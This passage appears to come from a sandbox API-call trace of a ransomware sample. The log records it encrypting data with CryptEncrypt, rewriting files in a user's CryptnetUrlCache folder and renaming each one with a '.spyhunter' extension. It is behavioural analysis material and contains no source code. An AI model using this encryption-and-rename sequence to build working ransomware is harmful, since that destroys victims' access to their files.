SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.751] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x248ee2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee2c*=0x180, lpOverlapped=0x0) returned 1 [0151.751] GetProcessHeap () returned 0x2c0000 [0151.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.751] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.751] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee2c, lpOverlapped=0x0 | out: lpBuffer=0x248ee6c*, lpNumberOfBytesWritten=0x248ee2c*=0x4, lpOverlapped=0x0) returned 1 [0151.752] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee2c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee2c*=0x30, lpOverlapped=0x0) returned 1 [0151.753] CloseHandle (hObject=0xb0) returned 1 [0151.753] GetProcessHeap () returned 0x2c0000 [0151.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.753] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.spyhunter") returned 162 [0151.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56.spyhunter")) returned 1 [0151.753] GetProcessHeap () returned 0x2c0000 [0151.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.754] GetProcessHeap () returned 0x2c0000 [0151.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.754] GetProcessHeap () returned 0x2c0000 [0151.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feb458 | out: hHeap=0x2c0000) returned 1 [0151.754] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee70 | out: pbBuffer=0x248ee70) returned 1 [0151.754] GetProcessHeap () returned 0x2c0000 [0151.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.754] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee68*=0x30) returned 1 [0151.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 152 [0151.755] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".txt") returned 0x0 [0151.755] GetProcessHeap () returned 0x2c0000 [0151.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.755] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee2c*=0x186, lpOverlapped=0x0) returned 1 [0151.757] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.757] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x248ee2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee2c*=0x186, lpOverlapped=0x0) returned 1 [0151.757] GetProcessHeap () returned 0x2c0000 [0151.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.757] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.757] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee2c, lpOverlapped=0x0 | out: lpBuffer=0x248ee6c*, lpNumberOfBytesWritten=0x248ee2c*=0x4, lpOverlapped=0x0) returned 1 [0151.757] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee2c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee2c*=0x30, lpOverlapped=0x0) returned 1 [0151.757] CloseHandle (hObject=0xb0) returned 1 [0151.757] GetProcessHeap () returned 0x2c0000 [0151.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.758] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.spyhunter") returned 162 [0151.758] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb.spyhunter")) returned 1 [0151.762] GetProcessHeap () returned 0x2c0000 [0151.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.762] GetProcessHeap () returned 0x2c0000 [0151.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.762] GetProcessHeap () returned 0x2c0000 [0151.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feb2d0 | out: hHeap=0x2c0000) returned 1 [0151.762] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee68 | out: pbBuffer=0x248ee68) returned 1 [0151.762] GetProcessHeap () returned 0x2c0000 [0151.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.762] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee60*=0x30) returned 1 [0151.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.772] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 152 [0151.773] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".txt") returned 0x0 [0151.773] GetProcessHeap () returned 0x2c0000 [0151.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.773] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee24*=0x182, lpOverlapped=0x0) returned 1 [0151.774] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.774] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x248ee24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee24*=0x182, lpOverlapped=0x0) returned 1 [0151.774] GetProcessHeap () returned 0x2c0000 [0151.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.774] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.774] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee24, lpOverlapped=0x0 | out: lpBuffer=0x248ee64*, lpNumberOfBytesWritten=0x248ee24*=0x4, lpOverlapped=0x0) returned 1 [0151.774] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee24, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee24*=0x30, lpOverlapped=0x0) returned 1 [0151.775] CloseHandle (hObject=0xb0) returned 1 [0151.775] GetProcessHeap () returned 0x2c0000 [0151.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.775] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.spyhunter") returned 162 [0151.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30.spyhunter")) returned 1 [0151.776] GetProcessHeap () returned 0x2c0000 [0151.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.776] GetProcessHeap () returned 0x2c0000 [0151.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.776] GetProcessHeap () returned 0x2c0000 [0151.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feb148 | out: hHeap=0x2c0000) returned 1 [0151.776] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee68 | out: pbBuffer=0x248ee68) returned 1 [0151.776] GetProcessHeap () returned 0x2c0000 [0151.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.776] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee60*=0x30) returned 1 [0151.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.777] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 152 [0151.777] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".txt") returned 0x0 [0151.777] GetProcessHeap () returned 0x2c0000 [0151.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.777] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee24*=0x186, lpOverlapped=0x0) returned 1 [0151.778] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.778] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x248ee24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee24*=0x186, lpOverlapped=0x0) returned 1 [0151.778] GetProcessHeap () returned 0x2c0000 [0151.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.778] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.778] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee24, lpOverlapped=0x0 | out: lpBuffer=0x248ee64*, lpNumberOfBytesWritten=0x248ee24*=0x4, lpOverlapped=0x0) returned 1 [0151.778] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee24, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee24*=0x30, lpOverlapped=0x0) returned 1 [0151.778] CloseHandle (hObject=0xb0) returned 1 [0151.778] GetProcessHeap () returned 0x2c0000 [0151.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.778] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.spyhunter") returned 162 [0151.779] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e.spyhunter")) returned 1 [0151.779] GetProcessHeap () returned 0x2c0000 [0151.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.779] GetProcessHeap () returned 0x2c0000 [0151.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.779] GetProcessHeap () returned 0x2c0000 [0151.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feafc0 | out: hHeap=0x2c0000) returned 1 [0151.779] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee60 | out: pbBuffer=0x248ee60) returned 1 [0151.780] GetProcessHeap () returned 0x2c0000 [0151.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.780] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee58*=0x30) returned 1 [0151.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.781] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 152 [0151.781] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".txt") returned 0x0 [0151.781] GetProcessHeap () returned 0x2c0000 [0151.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.781] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee1c*=0x186, lpOverlapped=0x0) returned 1 [0151.782] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.782] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x248ee1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee1c*=0x186, lpOverlapped=0x0) returned 1 [0151.782] GetProcessHeap () returned 0x2c0000 [0151.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.782] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.786] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee1c, lpOverlapped=0x0 | out: lpBuffer=0x248ee5c*, lpNumberOfBytesWritten=0x248ee1c*=0x4, lpOverlapped=0x0) returned 1 [0151.786] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee1c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee1c*=0x30, lpOverlapped=0x0) returned 1 [0151.786] CloseHandle (hObject=0xb0) returned 1 [0151.787] GetProcessHeap () returned 0x2c0000 [0151.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.787] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.spyhunter") returned 162 [0151.787] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed.spyhunter")) returned 1 [0151.787] GetProcessHeap () returned 0x2c0000 [0151.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.788] GetProcessHeap () returned 0x2c0000 [0151.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.788] GetProcessHeap () returned 0x2c0000 [0151.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feae38 | out: hHeap=0x2c0000) returned 1 [0151.788] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee60 | out: pbBuffer=0x248ee60) returned 1 [0151.788] GetProcessHeap () returned 0x2c0000 [0151.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.788] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee58*=0x30) returned 1 [0151.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.788] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 152 [0151.788] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".txt") returned 0x0 [0151.789] GetProcessHeap () returned 0x2c0000 [0151.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.789] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee1c*=0x182, lpOverlapped=0x0) returned 1 [0151.789] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.790] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x248ee1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee1c*=0x182, lpOverlapped=0x0) returned 1 [0151.791] GetProcessHeap () returned 0x2c0000 [0151.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.791] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.791] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee1c, lpOverlapped=0x0 | out: lpBuffer=0x248ee5c*, lpNumberOfBytesWritten=0x248ee1c*=0x4, lpOverlapped=0x0) returned 1 